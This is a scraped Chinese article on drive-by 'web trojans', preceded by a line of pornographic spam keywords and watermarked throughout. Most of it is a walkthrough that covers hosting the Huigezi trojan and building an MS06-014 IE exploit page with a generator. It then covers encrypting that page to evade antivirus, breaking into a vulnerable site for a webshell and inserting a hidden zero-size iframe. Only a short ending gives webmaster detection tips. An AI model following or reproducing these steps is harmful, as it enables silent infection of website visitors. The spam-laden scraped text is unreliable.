久久无码高潮喷水抽搐,极品馒头泬19p,久久人人爽精品玩人妻av,精品国产成人国产在线视,精品视频一区二区三区在线观看

 WFO紅軟基地

　　潛伏的攻擊者：網頁木馬WFO紅軟基地

 WFO紅軟基地

　　為什么我們一打開網頁就會運行木馬程序，木馬又是如何“掛”在網站上的呢？這就要涉及“網頁木馬”這個概念。 網頁木馬就是將木馬和網頁結合在一起，打開網頁的同時也會運行木馬。最初的網頁木馬原理是利用IE瀏覽器的ActiveX控件，運行網頁木馬后會彈出一個控件下載提示，只有點擊確認后才會運行其中的木馬。這種網頁木馬在當時網絡安全意識普遍不高的情況下還是有一點使用價值的，但是其缺點是顯而易見的，就是會出現(xiàn)ActiveX控件下載提示。當然現(xiàn)在很少會有人去點擊那莫名其妙的ActiveX控件下載確認窗口。WFO紅軟基地

　　在這種情況下，新的網頁木馬誕生了。這類網頁木馬通常利用了IE瀏覽器的漏洞，在運行的時候沒有絲毫提示，因此隱蔽性極高�？梢哉f，正是IE瀏覽器層出不窮的漏洞造成了如今網頁木馬橫行的網絡。例如最近的IE瀏覽器漏洞MS06-014，就可以利用來制作一個絕對隱蔽的網頁木馬。下面讓我們看看利用MS06-014制作網頁木馬的過程。WFO紅軟基地

　　網頁木馬當然得有木馬程序，這里我們使用上文中提到的“灰鴿子”木馬。然后我們要下載一個MS06-014網頁木馬生成器。接著還要一個網頁空間，三者準備完畢后，就可以開始測試了。WFO紅軟基地

生成網頁木馬WFO紅軟基地

　　首先將木馬程序上傳到網頁空間中。運行“MS06-014木馬生成器”，在“木馬地址”中填入已經上傳到空間中的木馬網址，并勾選下方的“是否隱藏源碼”選項。這個選項的作用是當網頁木馬運行后，會自動清空網頁源文件，用戶即使起了疑心也無法找到痕跡。當然清空的是用戶打開的源文件，而網頁木馬卻不受影響。點擊“生成網馬”按鈕即可在程序的同目錄生成一個名為muma.htm的網頁木馬。WFO紅軟基地
　　配置網頁木馬繼續(xù)進行網頁木馬的配置，在“欲加密的網頁”中瀏覽選中生成的網頁木馬。網頁木馬在運行時會利用IE的漏洞，其中肯定存在漏洞利用代碼，這些代碼會被殺毒軟件檢測出來，因此要想隱蔽地運行網頁木馬，加密木馬程序還不夠，還需對網頁木馬進行加密。“MS06-014木馬生成器”的“加密方式”中提供了四種網頁的加密方式，分別是：空字符加密、轉義字符加密、Escape加密和拆分特征碼。這里我們使用“轉義字符加密”加密方式，選中“轉義字符加密”選項后點擊“加密”按鈕，免殺的網頁木馬就生成了。將該加密過的網頁木馬上傳到網頁空間中即可。WFO紅軟基地

　　尋找缺陷網站，寫入網頁木馬WFO紅軟基地

　　網頁木馬準備完畢，就等著尋找掛馬的目標網站了。此時黑客會到處搜索，尋找有腳本缺陷的網站程序，找到后利用網站程序的漏洞入侵網站，并得到網站的一個webshell。這時我們可以編輯網站首頁的內容，將掛馬的代碼插入即可。代碼為：<iframe src="/muma.htm"; width="0" height="0" frameborder="0"></iframe>，src參數后面的是網頁木馬的地址。當我們打開這個網站的首頁后，會彈出網頁木馬的頁面，這個頁面我們是無法看到的，因為我們在代碼中設置了彈出頁面的窗口長寬各為0。此時木馬也已經悄悄下載到本機并運行了。我們可以看到，網站的首頁顯示正常，殺毒軟件并沒有任何反應，而木馬卻已經運行了，可見木馬的隱蔽性很高，危害也相當嚴重。WFO紅軟基地

　　“掛馬”攻擊已經成為目前最流行的攻擊方式，面對數量龐大的“掛馬”網站，我們該如何防御呢？作為一名網站站長，我們又如何知道自己的網站被人掛馬了呢？站長防范：如果你是一名站長，可以對網站首頁以及其他主要頁面的源代碼進行檢查，如用記事本打開這些頁面后，以“<iframe>”為關鍵字進行搜索，找到后可以查看是否是掛馬代碼。不過碰上有經驗的黑客，會編寫一段代碼將整句掛馬代碼進行加密，這樣我們就很難找到網頁中的掛馬代碼。這時，我們可以采用“掘馬”-北京智恒聯(lián)盟公司出品的一個專門針對網頁木馬代碼檢測的一個系統(tǒng)，可以幫助解決代碼量較大，網頁木馬存在形式多樣檢查困難的問題。系統(tǒng)定期升級可以檢測1000多種網頁木馬，檢測定位非常準！WFO紅軟基地

來源：紅訊頻道